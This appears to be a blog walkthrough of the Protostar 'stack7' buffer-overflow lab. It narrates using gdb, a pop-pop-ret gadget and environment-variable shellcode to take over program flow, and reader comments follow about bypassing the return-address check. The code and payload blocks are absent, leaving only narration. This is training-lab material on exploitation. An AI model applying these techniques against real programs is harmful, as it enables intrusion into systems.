Here we go...
This time we will start here:
Vulnerable source code is known, with gets you should be already familiar (after reading this book;)). So we can try to takeover the program's flow.
Let's run stack7 in gdb (just like we did it last time). We should be here:
Good. Checking getpath():
Let's set a breakpoint in the end of getpath() function - on ret address - 0x08048544:
Now we will switch to the shell from gdb to prepare a payload-file:
So far, so good. :) Checking ESP:
Accorgin to the source our buffer is 64b long. Let's modify our payload-file to make it larger:
Looks better now. ;) Let's try to modify it a little bit more:
At this stage I decide to check for pop-pop-ret instruction(s). To do that I used:
Good. We will need that value later.
Let's modify our poc-payload:
Now we need to store the shellcode somewhere in the memory. I used OS environment variable to do that - SCODE:
To get the address of the variable I used simple program from old tutorials - get_sp.c ;)
For now our poc-payload looks like this:
We are ready to check it:
Now we are ready to move to the next case... :)
See you soon!
Cheers
How exactly are you bypassing the return address check at line 17? Wasn't it meant to be a ret2libc exploit?
OdpowiedzUsuńSorry to disappoint you :| I just changed proposed 0xb... to something else (which was the place with the shellcode).
Usuń